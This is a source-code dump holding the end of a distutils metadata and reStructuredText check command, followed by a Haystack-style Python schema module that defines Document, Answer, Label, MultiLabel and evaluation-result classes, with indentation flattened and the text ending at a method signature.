metadata = self.distribution.metadata
missing = []
for attr in ('name', 'version', 'url'):
if not (hasattr(metadata, attr) and getattr(metadata, attr)):
missing.append(attr)
if missing:
self.warn("missing required meta-data: %s" % ', '.join(missing))
if metadata.author:
if not metadata.author_email:
self.warn("missing meta-data: if 'author' supplied, " +
"'author_email' must be supplied too")
elif metadata.maintainer:
if not metadata.maintainer_email:
self.warn("missing meta-data: if 'maintainer' supplied, " +
"'maintainer_email' must be supplied too")
else:
self.warn("missing meta-data: either (author and author_email) " +
"or (maintainer and maintainer_email) " +
"must be supplied")
def check_restructuredtext(self):
"""Checks if the long string fields are reST-compliant."""
data = self.distribution.get_long_description()
for warning in self._check_rst_data(data):
line = warning[-1].get('line')
if line is None:
warning = warning[1]
else:
warning = '%s (line %s)' % (warning[1], line)
self.warn(warning)
def _check_rst_data(self, data):
"""Returns warnings when the provided data doesn't compile."""
# the include and csv_table directives need this to be a path
source_path = self.distribution.script_name or 'setup.py'
parser = Parser()
settings = frontend.OptionParser(components=(Parser,)).get_default_values()
settings.tab_width = 4
settings.pep_references = None
settings.rfc_references = None
reporter = SilentReporter(source_path,
settings.report_level,
settings.halt_level,
stream=settings.warning_stream,
debug=settings.debug,
encoding=settings.error_encoding,
error_handler=settings.error_encoding_error_handler)
document = nodes.document(settings, reporter, source=source_path)
document.note_source(source_path, -1)
try:
parser.parse(data, document)
except AttributeError as e:
reporter.messages.append(
(-1, 'Could not finish the parsing: %s.' % e, '', {}))
return reporter.messages
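# Hedged usage sketch (not part of the module): the check command is normally run
# from the command line of a distutils/setuptools project,
#
#     python setup.py check --metadata --restructuredtext --strict
#
# or programmatically through the usual Command lifecycle:
#
#     cmd = check(dist)        # `dist` is a distutils Distribution instance
#     cmd.restructuredtext = 1
#     cmd.ensure_finalized()
#     cmd.run()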
|
the-stack_106_15886
|
from __future__ import annotations
import typing
from typing import Any, Optional, Dict, List, Union
from dataclasses import asdict
try:
from typing import Literal
except ImportError:
from typing_extensions import Literal # type: ignore
if typing.TYPE_CHECKING:
from dataclasses import dataclass
else:
from pydantic.dataclasses import dataclass
from pydantic.json import pydantic_encoder
from pathlib import Path
from uuid import uuid4
import mmh3
import numpy as np
import logging
import time
import json
import pandas as pd
import ast
logger = logging.getLogger(__name__)
from pydantic import BaseConfig
BaseConfig.arbitrary_types_allowed = True
@dataclass
class Document:
content: Union[str, pd.DataFrame]
content_type: Literal["text", "table", "image"]
id: str
meta: Dict[str, Any]
score: Optional[float] = None
embedding: Optional[np.ndarray] = None
id_hash_keys: Optional[List[str]] = None
# We use a custom init here as we want some custom logic. The annotations above are however still needed in order
# to use some dataclass magic like "asdict()". See https://www.python.org/dev/peps/pep-0557/#custom-init-method
# They also help in annotating which object attributes will always be present (e.g. "id") even though they
    # don't need to be passed by the user in init and are rather initialized automatically in the init
def __init__(
self,
content: Union[str, pd.DataFrame],
content_type: Literal["text", "table", "image"] = "text",
id: Optional[str] = None,
score: Optional[float] = None,
meta: Dict[str, Any] = None,
embedding: Optional[np.ndarray] = None,
id_hash_keys: Optional[List[str]] = None,
):
"""
One of the core data classes in Haystack. It's used to represent documents / passages in a standardized way within Haystack.
Documents are stored in DocumentStores, are returned by Retrievers, are the input for Readers and are used in
many other places that manipulate or interact with document-level data.
Note: There can be multiple Documents originating from one file (e.g. PDF), if you split the text
into smaller passages. We'll have one Document per passage in this case.
Each document has a unique ID. This can be supplied by the user or generated automatically.
It's particularly helpful for handling of duplicates and referencing documents in other objects (e.g. Labels)
There's an easy option to convert from/to dicts via `from_dict()` and `to_dict`.
:param content: Content of the document. For most cases, this will be text, but it can be a table or image.
        :param content_type: One of "text", "table" or "image". Haystack components can use this to adjust their
handling of Documents and check compatibility.
:param id: Unique ID for the document. If not supplied by the user, we'll generate one automatically by
creating a hash from the supplied text. This behaviour can be further adjusted by `id_hash_keys`.
:param score: The relevance score of the Document determined by a model (e.g. Retriever or Re-Ranker).
In the range of [0,1], where 1 means extremely relevant.
:param meta: Meta fields for a document like name, url, or author in the form of a custom dict (any keys and values allowed).
:param embedding: Vector encoding of the text
        :param id_hash_keys: Generate the document id from a custom list of strings that refer to the document's attributes.
                             If you want to ensure you don't have duplicate documents in your DocumentStore but texts are
not unique, you can modify the metadata and pass e.g. "meta" to this field (e.g. ["content", "meta"]).
In this case the id will be generated by using the content and the defined metadata.
"""
if content is None:
raise ValueError(f"Can't create 'Document': Mandatory 'content' field is None")
self.content = content
self.content_type = content_type
self.score = score
self.meta = meta or {}
allowed_hash_key_attributes = ["content", "content_type", "score", "meta", "embedding"]
if id_hash_keys is not None:
if not set(id_hash_keys) <= set(allowed_hash_key_attributes): # type: ignore
raise ValueError(
f"You passed custom strings {id_hash_keys} to id_hash_keys which is deprecated. Supply instead a list of Document's attribute names that the id should be based on (e.g. {allowed_hash_key_attributes}). See https://github.com/deepset-ai/haystack/pull/1910 for details)"
)
if embedding is not None:
embedding = np.asarray(embedding)
self.embedding = embedding
# Create a unique ID (either new one, or one from user input)
if id:
self.id: str = str(id)
else:
self.id: str = self._get_id(id_hash_keys=id_hash_keys)
def _get_id(self, id_hash_keys: Optional[List[str]] = None):
"""
Generate the id of a document by creating the hash of strings. By default the content of a document is
used to generate the hash. There are two ways of modifying the generated id of a document. Either static keys
or a selection of the content.
:param id_hash_keys: Optional list of fields that should be dynamically used to generate the hash.
"""
if id_hash_keys is None:
return "{:02x}".format(mmh3.hash128(str(self.content), signed=False))
final_hash_key = ""
for attr in id_hash_keys:
final_hash_key += ":" + str(getattr(self, attr))
if final_hash_key == "":
raise ValueError(
f"Cant't create 'Document': 'id_hash_keys' must contain at least one of ['content', 'meta']"
)
return "{:02x}".format(mmh3.hash128(final_hash_key, signed=False))
def to_dict(self, field_map={}) -> Dict:
"""
Convert Document to dict. An optional field_map can be supplied to change the names of the keys in the
resulting dict. This way you can work with standardized Document objects in Haystack, but adjust the format that
they are serialized / stored in other places (e.g. elasticsearch)
Example:
| doc = Document(content="some text", content_type="text")
| doc.to_dict(field_map={"custom_content_field": "content"})
| >>> {"custom_content_field": "some text", content_type": "text"}
:param field_map: Dict with keys being the custom target keys and values being the standard Document attributes
:return: dict with content of the Document
"""
inv_field_map = {v: k for k, v in field_map.items()}
_doc: Dict[str, str] = {}
for k, v in self.__dict__.items():
if k == "content":
# Convert pd.DataFrame to list of rows for serialization
if self.content_type == "table" and isinstance(self.content, pd.DataFrame):
v = [self.content.columns.tolist()] + self.content.values.tolist()
k = k if k not in inv_field_map else inv_field_map[k]
_doc[k] = v
return _doc
@classmethod
def from_dict(cls, dict, field_map={}, id_hash_keys=None):
"""
Create Document from dict. An optional field_map can be supplied to adjust for custom names of the keys in the
input dict. This way you can work with standardized Document objects in Haystack, but adjust the format that
they are serialized / stored in other places (e.g. elasticsearch)
Example:
| my_dict = {"custom_content_field": "some text", content_type": "text"}
| Document.from_dict(my_dict, field_map={"custom_content_field": "content"})
:param field_map: Dict with keys being the custom target keys and values being the standard Document attributes
        :return: A Document object constructed from the dict.
"""
_doc = dict.copy()
init_args = ["content", "content_type", "id", "score", "question", "meta", "embedding"]
if "meta" not in _doc.keys():
_doc["meta"] = {}
# copy additional fields into "meta"
for k, v in _doc.items():
if k not in init_args and k not in field_map:
_doc["meta"][k] = v
# remove additional fields from top level
_new_doc = {}
for k, v in _doc.items():
if k in init_args:
_new_doc[k] = v
elif k in field_map:
k = field_map[k]
_new_doc[k] = v
if _doc.get("id") is None:
_new_doc["id_hash_keys"] = id_hash_keys
# Convert list of rows to pd.DataFrame
if _new_doc.get("content_type", None) == "table" and isinstance(_new_doc["content"], list):
_new_doc["content"] = pd.DataFrame(columns=_new_doc["content"][0], data=_new_doc["content"][1:])
return cls(**_new_doc)
def to_json(self, field_map={}) -> str:
d = self.to_dict(field_map=field_map)
j = json.dumps(d, cls=NumpyEncoder)
return j
@classmethod
def from_json(cls, data: str, field_map={}):
d = json.loads(data)
return cls.from_dict(d, field_map=field_map)
def __eq__(self, other):
return (
isinstance(other, self.__class__)
and getattr(other, "content", None) == self.content
and getattr(other, "content_type", None) == self.content_type
and getattr(other, "id", None) == self.id
and getattr(other, "score", None) == self.score
and getattr(other, "meta", None) == self.meta
and np.array_equal(getattr(other, "embedding", None), self.embedding)
and getattr(other, "id_hash_keys", None) == self.id_hash_keys
)
def __repr__(self):
return f"<Document: {str(self.to_dict())}>"
def __str__(self):
# In some cases, self.content is None (therefore not subscriptable)
if not self.content:
return f"<Document: id={self.id}, content=None>"
return f"<Document: id={self.id}, content='{self.content[:100]} {'...' if len(self.content) > 100 else ''}'>"
def __lt__(self, other):
"""Enable sorting of Documents by score"""
return self.score < other.score
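# --- Illustrative usage sketch (not part of the original module) ---------------------
# A minimal example of constructing a Document and round-tripping it through to_dict()/
# from_dict() with a custom field name. It relies only on names defined in this module,
# the concrete values are invented for demonstration, and it is never called anywhere.
def _example_document_usage():
    doc = Document(
        content="Berlin is the capital of Germany.",
        content_type="text",
        meta={"name": "capitals.txt"},
    )
    # Serialize with a custom key for `content`, e.g. for an external document store
    as_dict = doc.to_dict(field_map={"custom_content_field": "content"})
    # Restore a Document from that dict using the same field_map
    restored = Document.from_dict(as_dict, field_map={"custom_content_field": "content"})
    assert restored.id == doc.id
    return restored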
@dataclass
class Span:
start: int
end: int
"""
Defining a sequence of characters (Text span) or cells (Table span) via start and end index.
For extractive QA: Character where answer starts/ends
For TableQA: Cell where the answer starts/ends (counted from top left to bottom right of table)
:param start: Position where the span starts
    :param end: Position where the span ends
"""
@dataclass
class Answer:
answer: str
type: Literal["generative", "extractive", "other"] = "extractive"
score: Optional[float] = None
context: Optional[Union[str, pd.DataFrame]] = None
offsets_in_document: Optional[List[Span]] = None
offsets_in_context: Optional[List[Span]] = None
document_id: Optional[str] = None
meta: Optional[Dict[str, Any]] = None
"""
The fundamental object in Haystack to represent any type of Answers (e.g. extractive QA, generative QA or TableQA).
For example, it's used within some Nodes like the Reader, but also in the REST API.
    :param answer: The answer string. If there's no possible answer (aka "no_answer" or "is_impossible") this will be an empty string.
:param type: One of ("generative", "extractive", "other"): Whether this answer comes from an extractive model
(i.e. we can locate an exact answer string in one of the documents) or from a generative model
(i.e. no pointer to a specific document, no offsets ...).
:param score: The relevance score of the Answer determined by a model (e.g. Reader or Generator).
In the range of [0,1], where 1 means extremely relevant.
:param context: The related content that was used to create the answer (i.e. a text passage, part of a table, image ...)
:param offsets_in_document: List of `Span` objects with start and end positions of the answer **in the
document** (as stored in the document store).
                                For extractive QA: Character where answer starts => `Answer.offsets_in_document[0].start`
                                For TableQA: Cell where the answer starts (counted from top left to bottom right of table) => `Answer.offsets_in_document[0].start`
(Note that in TableQA there can be multiple cell ranges that are relevant for the answer, thus there can be multiple `Spans` here)
:param offsets_in_context: List of `Span` objects with start and end positions of the answer **in the
context** (i.e. the surrounding text/table of a certain window size).
                               For extractive QA: Character where answer starts => `Answer.offsets_in_context[0].start`
                               For TableQA: Cell where the answer starts (counted from top left to bottom right of table) => `Answer.offsets_in_context[0].start`
(Note that in TableQA there can be multiple cell ranges that are relevant for the answer, thus there can be multiple `Spans` here)
    :param document_id: ID of the document that the answer was located in (if any)
:param meta: Dict that can be used to associate any kind of custom meta data with the answer.
In extractive QA, this will carry the meta data of the document where the answer was found.
"""
def __post_init__(self):
# In case offsets are passed as dicts rather than Span objects we convert them here
# For example, this is used when instantiating an object via from_json()
if self.offsets_in_document is not None:
self.offsets_in_document = [Span(**e) if isinstance(e, dict) else e for e in self.offsets_in_document]
if self.offsets_in_context is not None:
self.offsets_in_context = [Span(**e) if isinstance(e, dict) else e for e in self.offsets_in_context]
if self.meta is None:
self.meta = {}
def __lt__(self, other):
"""Enable sorting of Answers by score"""
return self.score < other.score
def __str__(self):
# self.context might be None (therefore not subscriptable)
if not self.context:
return f"<Answer: answer='{self.answer}', score={self.score}, context=None>"
return f"<Answer: answer='{self.answer}', score={self.score}, context='{self.context[:50]}{'...' if len(self.context) > 50 else ''}'>"
def __repr__(self):
return f"<Answer {asdict(self)}>"
def to_dict(self):
return asdict(self)
@classmethod
def from_dict(cls, dict: dict):
return _pydantic_dataclass_from_dict(dict=dict, pydantic_dataclass_type=cls)
def to_json(self):
return json.dumps(self, default=pydantic_encoder)
@classmethod
def from_json(cls, data):
if type(data) == str:
data = json.loads(data)
return cls.from_dict(data)
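# --- Illustrative usage sketch (not part of the original module) ---------------------
# Shows how an extractive Answer with character offsets might be built and serialized to
# JSON and back. All values (offsets, score, document_id) are invented for demonstration
# and the function is never called anywhere.
def _example_answer_usage():
    ans = Answer(
        answer="Berlin",
        type="extractive",
        score=0.87,
        context="Berlin is the capital of Germany.",
        offsets_in_context=[Span(start=0, end=6)],
        offsets_in_document=[Span(start=11, end=17)],  # assumed position within the full document
        document_id="doc-1",
    )
    serialized = ans.to_json()
    # On deserialization the offset entries are restored as Span objects
    restored = Answer.from_json(serialized)
    return restored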
@dataclass
class Label:
id: str
query: str
document: Document
is_correct_answer: bool
is_correct_document: bool
origin: Literal["user-feedback", "gold-label"]
answer: Optional[Answer] = None
no_answer: Optional[bool] = None
pipeline_id: Optional[str] = None
created_at: Optional[str] = None
updated_at: Optional[str] = None
meta: Optional[dict] = None
# We use a custom init here as we want some custom logic. The annotations above are however still needed in order
# to use some dataclass magic like "asdict()". See https://www.python.org/dev/peps/pep-0557/#custom-init-method
def __init__(
self,
query: str,
document: Document,
is_correct_answer: bool,
is_correct_document: bool,
origin: Literal["user-feedback", "gold-label"],
answer: Optional[Answer],
id: Optional[str] = None,
no_answer: Optional[bool] = None,
pipeline_id: Optional[str] = None,
created_at: Optional[str] = None,
updated_at: Optional[str] = None,
meta: Optional[dict] = None,
):
"""
Object used to represent label/feedback in a standardized way within Haystack.
        This includes labels from datasets like SQuAD, annotations from labeling tools,
        or user feedback from the Haystack REST API.
:param query: the question (or query) for finding answers.
        :param document: the Document the label refers to (e.g. the passage that was annotated or retrieved).
:param answer: the answer object.
:param is_correct_answer: whether the sample is positive or negative.
        :param is_correct_document: in case of a negative sample (is_correct_answer is False), there could be two cases:
incorrect answer but correct document & incorrect document. This flag denotes if
the returned document was correct.
        :param origin: the source for the labels. It can be used later for filtering.
:param id: Unique ID used within the DocumentStore. If not supplied, a uuid will be generated automatically.
        :param no_answer: whether the question is unanswerable.
:param pipeline_id: pipeline identifier (any str) that was involved for generating this label (in-case of user feedback).
:param created_at: Timestamp of creation with format yyyy-MM-dd HH:mm:ss.
Generate in Python via time.strftime("%Y-%m-%d %H:%M:%S").
        :param updated_at: Timestamp of update with format yyyy-MM-dd HH:mm:ss.
Generate in Python via time.strftime("%Y-%m-%d %H:%M:%S")
:param meta: Meta fields like "annotator_name" in the form of a custom dict (any keys and values allowed).
"""
# Create a unique ID (either new one, or one from user input)
if id:
self.id = str(id)
else:
self.id = str(uuid4())
if created_at is None:
created_at = time.strftime("%Y-%m-%d %H:%M:%S")
self.created_at = created_at
self.updated_at = updated_at
self.query = query
self.answer = answer
self.document = document
self.is_correct_answer = is_correct_answer
self.is_correct_document = is_correct_document
self.origin = origin
# Remove
# self.document_id = document_id
# self.offset_start_in_doc = offset_start_in_doc
# If an Answer is provided we need to make sure that it's consistent with the `no_answer` value
# TODO: reassess if we want to enforce Span.start=0 and Span.end=0 for no_answer=True
if self.answer is not None:
if no_answer == True:
if self.answer.answer != "" or self.answer.context:
raise ValueError(f"Got no_answer == True while there seems to be an possible Answer: {self.answer}")
elif no_answer == False:
if self.answer.answer == "":
raise ValueError(
f"Got no_answer == False while there seems to be no possible Answer: {self.answer}"
)
else:
# Automatically infer no_answer from Answer object
if self.answer.answer == "" or self.answer.answer is None:
no_answer = True
else:
no_answer = False
self.no_answer = no_answer
# TODO autofill answer.document_id if Document is provided
self.pipeline_id = pipeline_id
if not meta:
self.meta = dict()
else:
self.meta = meta
def to_dict(self):
return asdict(self)
@classmethod
def from_dict(cls, dict: dict):
return _pydantic_dataclass_from_dict(dict=dict, pydantic_dataclass_type=cls)
def to_json(self):
return json.dumps(self, default=pydantic_encoder)
@classmethod
def from_json(cls, data):
if type(data) == str:
data = json.loads(data)
return cls.from_dict(data)
# define __eq__ and __hash__ functions to deduplicate Label Objects
def __eq__(self, other):
return (
isinstance(other, self.__class__)
and getattr(other, "query", None) == self.query
and getattr(other, "answer", None) == self.answer
and getattr(other, "is_correct_answer", None) == self.is_correct_answer
and getattr(other, "is_correct_document", None) == self.is_correct_document
and getattr(other, "origin", None) == self.origin
and getattr(other, "document", None) == self.document
and getattr(other, "no_answer", None) == self.no_answer
and getattr(other, "pipeline_id", None) == self.pipeline_id
)
def __hash__(self):
return hash(
self.query
+ str(self.answer)
+ str(self.is_correct_answer)
+ str(self.is_correct_document)
+ str(self.origin)
+ str(self.document)
+ str(self.no_answer)
+ str(self.pipeline_id)
)
def __repr__(self):
return str(self.to_dict())
def __str__(self):
return str(self.to_dict())
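# --- Illustrative usage sketch (not part of the original module) ---------------------
# Builds a positive gold label for an invented query/document/answer triple. Note that
# `no_answer` is inferred automatically from the Answer object here. Never called anywhere.
def _example_label_usage():
    doc = Document(content="Berlin is the capital of Germany.", content_type="text")
    ans = Answer(answer="Berlin", context=doc.content, offsets_in_context=[Span(start=0, end=6)])
    label = Label(
        query="What is the capital of Germany?",
        document=doc,
        answer=ans,
        is_correct_answer=True,
        is_correct_document=True,
        origin="gold-label",
    )
    return label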
@dataclass
class MultiLabel:
def __init__(self, labels: List[Label], drop_negative_labels=False, drop_no_answers=False):
"""
There are often multiple `Labels` associated with a single query. For example, there can be multiple annotated
answers for one question or multiple documents contain the information you want for a query.
This class is "syntactic sugar" that simplifies the work with such a list of related Labels.
        It stores the original labels in MultiLabel.labels and provides additional aggregated attributes that are
        automatically created at init time. For example, MultiLabel.no_answer allows you to easily check whether
        any of the underlying Labels provides a text answer and therefore whether there is indeed a possible answer.
        :param labels: A list of labels that belong to the same query and shall be "grouped" together
:param drop_negative_labels: Whether to drop negative labels from that group (e.g. thumbs down feedback from UI)
:param drop_no_answers: Whether to drop labels that specify the answer is impossible
"""
# drop duplicate labels and remove negative labels if needed.
labels = list(set(labels))
if drop_negative_labels:
is_positive_label = lambda l: (l.is_correct_answer and l.is_correct_document) or (
l.answer is None and l.is_correct_document
)
labels = [l for l in labels if is_positive_label(l)]
if drop_no_answers:
labels = [l for l in labels if l.no_answer == False]
self.labels = labels
self.query = self._aggregate_labels(key="query", must_be_single_value=True)[0]
# Currently no_answer is only true if all labels are "no_answers", we could later introduce a param here to let
# users decided which aggregation logic they want
self.no_answer = False not in [l.no_answer for l in self.labels]
# Answer strings and offsets cleaned for no_answers:
# If there are only no_answers, offsets are empty and answers will be a single empty string
# which equals the no_answers representation of reader nodes.
if self.no_answer:
self.answers = [""]
self.gold_offsets_in_documents: List[dict] = []
self.gold_offsets_in_contexts: List[dict] = []
else:
answered = [l.answer for l in self.labels if not l.no_answer and l.answer is not None]
self.answers = [answer.answer for answer in answered]
self.gold_offsets_in_documents = []
self.gold_offsets_in_contexts = []
for answer in answered:
if answer.offsets_in_document is not None:
for span in answer.offsets_in_document:
self.gold_offsets_in_documents.append({"start": span.start, "end": span.end})
if answer.offsets_in_context is not None:
for span in answer.offsets_in_context:
self.gold_offsets_in_contexts.append({"start": span.start, "end": span.end})
# There are two options here to represent document_ids:
# taking the id from the document of each label or taking the document_id of each label's answer.
# We take the former as labels without answers are allowed.
#
# For no_answer cases document_store.add_eval_data() currently adds all documents coming from the SQuAD paragraph's context
# as separate no_answer labels, and thus with document.id but without answer.document_id.
# If we do not exclude them from document_ids this would be problematic for retriever evaluation as they do not contain the answer.
# Hence, we exclude them here as well.
self.document_ids = [l.document.id for l in self.labels if not l.no_answer]
self.document_contents = [l.document.content for l in self.labels if not l.no_answer]
def _aggregate_labels(self, key, must_be_single_value=True) -> List[Any]:
unique_values = set([getattr(l, key) for l in self.labels])
if must_be_single_value and len(unique_values) > 1:
raise ValueError(
f"Tried to combine attribute '{key}' of Labels, but found multiple different values: {unique_values}"
)
else:
return list(unique_values)
def to_dict(self):
return asdict(self)
@classmethod
def from_dict(cls, dict: dict):
return _pydantic_dataclass_from_dict(dict=dict, pydantic_dataclass_type=cls)
def to_json(self):
return json.dumps(self, default=pydantic_encoder)
@classmethod
def from_json(cls, data):
if type(data) == str:
data = json.loads(data)
return cls.from_dict(data)
def __repr__(self):
return str(self.to_dict())
def __str__(self):
return str(self.to_dict())
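# --- Illustrative usage sketch (not part of the original module) ---------------------
# Aggregates two invented gold labels for the same query into a MultiLabel. After init,
# multi.answers contains both answer strings and multi.no_answer is False. Never called anywhere.
def _example_multilabel_usage():
    doc = Document(content="Berlin is the capital of Germany.")
    labels = [
        Label(query="What is the capital of Germany?", document=doc, answer=Answer(answer="Berlin"),
              is_correct_answer=True, is_correct_document=True, origin="gold-label"),
        Label(query="What is the capital of Germany?", document=doc, answer=Answer(answer="Berlin, Germany"),
              is_correct_answer=True, is_correct_document=True, origin="gold-label"),
    ]
    multi = MultiLabel(labels=labels, drop_negative_labels=True, drop_no_answers=True)
    return multi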
def _pydantic_dataclass_from_dict(dict: dict, pydantic_dataclass_type) -> Any:
"""
Constructs a pydantic dataclass from a dict incl. other nested dataclasses.
    This allows simple de-serialization of pydantic dataclasses from json.
:param dict: Dict containing all attributes and values for the dataclass.
:param pydantic_dataclass_type: The class of the dataclass that should be constructed (e.g. Document)
"""
base_model = pydantic_dataclass_type.__pydantic_model__.parse_obj(dict)
base_mode_fields = base_model.__fields__
values = {}
for base_model_field_name, base_model_field in base_mode_fields.items():
value = getattr(base_model, base_model_field_name)
values[base_model_field_name] = value
dataclass_object = pydantic_dataclass_type(**values)
return dataclass_object
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
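# --- Illustrative usage sketch (not part of the original module) ---------------------
# NumpyEncoder lets json.dumps() handle numpy arrays (e.g. embeddings) by converting them
# to plain lists. It assumes `json` and `numpy as np` are imported at the top of this file.
def _example_numpy_encoder_usage():
    payload = {"id": "doc-1", "embedding": np.array([0.1, 0.2, 0.3])}
    return json.dumps(payload, cls=NumpyEncoder)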
class EvaluationResult:
def __init__(self, node_results: Dict[str, pd.DataFrame] = None) -> None:
"""
Convenience class to store, pass and interact with results of a pipeline evaluation run (e.g. pipeline.eval()).
Detailed results are stored as one dataframe per node. This class makes them more accessible and provides
convenience methods to work with them.
For example, you can calculate eval metrics, get detailed reports or simulate different top_k settings.
Example:
```python
| eval_results = pipeline.eval(...)
|
| # derive detailed metrics
| eval_results.calculate_metrics()
|
| # show summary of incorrect queries
| eval_results.wrong_examples()
```
Each row of the underlying DataFrames contains either an answer or a document that has been retrieved during evaluation.
Rows are enriched with basic infos like rank, query, type or node.
Additional answer or document specific evaluation infos like gold labels
and metrics depicting whether the row matches the gold labels are included, too.
The DataFrames have the following schema:
- query: the query
- gold_answers (answers only): the answers to be given
- answer (answers only): the answer
- context (answers only): the surrounding context of the answer within the document
- exact_match (answers only): metric depicting if the answer exactly matches the gold label
- f1 (answers only): metric depicting how well the answer overlaps with the gold label on token basis
        - sas (answers only, optional): metric depicting how well the answer matches the gold label on a semantic basis
- gold_document_contents (documents only): the contents of the gold documents
- content (documents only): the content of the document
- gold_id_match (documents only): metric depicting whether one of the gold document ids matches the document
- answer_match (documents only): metric depicting whether the document contains the answer
- gold_id_or_answer_match (documents only): metric depicting whether one of the former two conditions are met
- rank: rank or 1-based-position in result list
- document_id: the id of the document that has been retrieved or that contained the answer
- gold_document_ids: the documents to be retrieved
- offsets_in_document (answers only): the position or offsets within the document the answer was found
        - gold_offsets_in_documents (answers only): the position or offsets of the gold answer within the document
- type: 'answer' or 'document'
- node: the node name
- eval_mode: evaluation mode depicting whether the evaluation was executed in integrated or isolated mode.
Check pipeline.eval()'s add_isolated_node_eval param for more information.
:param node_results: the evaluation Dataframes per pipeline node
"""
self.node_results: Dict[str, pd.DataFrame] = {} if node_results is None else node_results
def __getitem__(self, key: str):
return self.node_results.__getitem__(key)
def __delitem__(self, key: str):
self.node_results.__delitem__(key)
def __setitem__(self, key: str, value: pd.DataFrame):
self.node_results.__setitem__(key, value)
def __contains__(self, key: str):
return self.node_results.keys().__contains__(key)
def __len__(self):
return self.node_results.__len__()
def append(self, key: str, value: pd.DataFrame):
if value is not None and len(value) > 0:
if key in self.node_results:
self.node_results[key] = pd.concat([self.node_results[key], value])
else:
self.node_results[key] = value
def calculate_metrics(
self,
simulated_top_k_reader: int = -1,
simulated_top_k_retriever: int = -1,
doc_relevance_col: str = "gold_id_match",
eval_mode: str = "integrated",
) -> Dict[str, Dict[str, float]]:
"""
Calculates proper metrics for each node.
For document returning nodes default metrics are:
- mrr (Mean Reciprocal Rank: see https://en.wikipedia.org/wiki/Mean_reciprocal_rank)
- map (Mean Average Precision: see https://en.wikipedia.org/wiki/Evaluation_measures_%28information_retrieval%29#Mean_average_precision)
- ndcg (Normalized Discounted Cumulative Gain: see https://en.wikipedia.org/wiki/Discounted_cumulative_gain)
- precision (Precision: How many of the returned documents were relevant?)
- recall_multi_hit (Recall according to Information Retrieval definition: How many of the relevant documents were retrieved per query?)
- recall_single_hit (Recall for Question Answering: How many of the queries returned at least one relevant document?)
For answer returning nodes default metrics are:
- exact_match (How many of the queries returned the exact answer?)
- f1 (How well do the returned results overlap with any gold answer on token basis?)
        - sas if a SAS model has been provided during pipeline.eval() (How semantically similar is the prediction to the gold answers?)
Lower top_k values for reader and retriever than the actual values during the eval run can be simulated.
E.g. top_1_f1 for reader nodes can be calculated by setting simulated_top_k_reader=1.
Results for reader nodes with applied simulated_top_k_retriever should be considered with caution
as there are situations the result can heavily differ from an actual eval run with corresponding top_k_retriever.
:param simulated_top_k_reader: simulates top_k param of reader
:param simulated_top_k_retriever: simulates top_k param of retriever.
remarks: there might be a discrepancy between simulated reader metrics and an actual pipeline run with retriever top_k
:param doc_relevance_col: column in the underlying eval table that contains the relevance criteria for documents.
values can be: 'gold_id_match', 'answer_match', 'gold_id_or_answer_match'
:param eval_mode: the input on which the node was evaluated on.
Usually nodes get evaluated on the prediction provided by its predecessor nodes in the pipeline (value='integrated').
However, as the quality of the node itself can heavily depend on the node's input and thus the predecessor's quality,
you might want to simulate a perfect predecessor in order to get an independent upper bound of the quality of your node.
For example when evaluating the reader use value='isolated' to simulate a perfect retriever in an ExtractiveQAPipeline.
Values can be 'integrated', 'isolated'.
Default value is 'integrated'.
"""
return {
node: self._calculate_node_metrics(
df,
simulated_top_k_reader=simulated_top_k_reader,
simulated_top_k_retriever=simulated_top_k_retriever,
doc_relevance_col=doc_relevance_col,
eval_mode=eval_mode,
)
for node, df in self.node_results.items()
}
def wrong_examples(
self,
node: str,
n: int = 3,
simulated_top_k_reader: int = -1,
simulated_top_k_retriever: int = -1,
doc_relevance_col: str = "gold_id_match",
document_metric: str = "recall_single_hit",
answer_metric: str = "f1",
eval_mode: str = "integrated",
) -> List[Dict]:
"""
Returns the worst performing queries.
Worst performing queries are calculated based on the metric
that is either a document metric or an answer metric according to the node type.
Lower top_k values for reader and retriever than the actual values during the eval run can be simulated.
See calculate_metrics() for more information.
:param simulated_top_k_reader: simulates top_k param of reader
:param simulated_top_k_retriever: simulates top_k param of retriever.
remarks: there might be a discrepancy between simulated reader metrics and an actual pipeline run with retriever top_k
:param doc_relevance_col: column that contains the relevance criteria for documents.
values can be: 'gold_id_match', 'answer_match', 'gold_id_or_answer_match'
:param document_metric: the document metric worst queries are calculated with.
values can be: 'recall_single_hit', 'recall_multi_hit', 'mrr', 'map', 'precision'
        :param answer_metric: the answer metric worst queries are calculated with.
values can be: 'f1', 'exact_match' and 'sas' if the evaluation was made using a SAS model.
:param eval_mode: the input on which the node was evaluated on.
Usually nodes get evaluated on the prediction provided by its predecessor nodes in the pipeline (value='integrated').
However, as the quality of the node itself can heavily depend on the node's input and thus the predecessor's quality,
you might want to simulate a perfect predecessor in order to get an independent upper bound of the quality of your node.
For example when evaluating the reader use value='isolated' to simulate a perfect retriever in an ExtractiveQAPipeline.
Values can be 'integrated', 'isolated'.
Default value is 'integrated'.
"""
node_df = self.node_results[node]
node_df = self._filter_eval_mode(node_df, eval_mode)
answers = node_df[node_df["type"] == "answer"]
if len(answers) > 0:
metrics_df = self._build_answer_metrics_df(
answers,
simulated_top_k_reader=simulated_top_k_reader,
simulated_top_k_retriever=simulated_top_k_retriever,
)
worst_df = metrics_df.sort_values(by=[answer_metric]).head(n)
wrong_examples = []
for query, metrics in worst_df.iterrows():
query_answers = answers[answers["query"] == query]
query_dict = {
"query": query,
"metrics": metrics.to_dict(),
"answers": query_answers.drop(
["node", "query", "type", "gold_answers", "gold_offsets_in_documents", "gold_document_ids"],
axis=1,
).to_dict(orient="records"),
"gold_answers": query_answers["gold_answers"].iloc[0],
"gold_document_ids": query_answers["gold_document_ids"].iloc[0],
}
wrong_examples.append(query_dict)
return wrong_examples
documents = node_df[node_df["type"] == "document"]
if len(documents) > 0:
metrics_df = self._build_document_metrics_df(
documents, simulated_top_k_retriever=simulated_top_k_retriever, doc_relevance_col=doc_relevance_col
)
worst_df = metrics_df.sort_values(by=[document_metric]).head(n)
wrong_examples = []
for query, metrics in worst_df.iterrows():
query_documents = documents[documents["query"] == query]
query_dict = {
"query": query,
"metrics": metrics.to_dict(),
"documents": query_documents.drop(
["node", "query", "type", "gold_document_ids", "gold_document_contents"], axis=1
).to_dict(orient="records"),
"gold_document_ids": query_documents["gold_document_ids"].iloc[0],
}
wrong_examples.append(query_dict)
return wrong_examples
return []
def _calculate_node_metrics(
self,
df: pd.DataFrame,
simulated_top_k_reader: int = -1,
simulated_top_k_retriever: int = -1,
doc_relevance_col: str = "gold_id_match",
eval_mode: str = "integrated",
) -> Dict[str, float]:
